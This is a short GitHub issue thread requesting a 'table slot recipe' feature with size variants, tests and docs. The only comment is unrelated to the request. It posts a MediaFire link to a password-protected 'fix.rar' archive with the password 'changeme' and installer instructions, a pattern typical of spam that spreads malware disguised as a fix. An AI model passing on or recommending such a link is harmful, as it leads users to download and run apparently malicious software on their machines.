### ISSUE TITLE
[Feat?]: make table slot recipe

### ISSUE THREAD

**Issue by caseybaggz** [omnifed/cerberus#403]
### Duplicates

- [X] I have searched the existing issues

### Latest version

- [X] I have tested the latest version

### Summary 💡

- [x] recipe & size variants
- [x] tests
- [x] docs

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
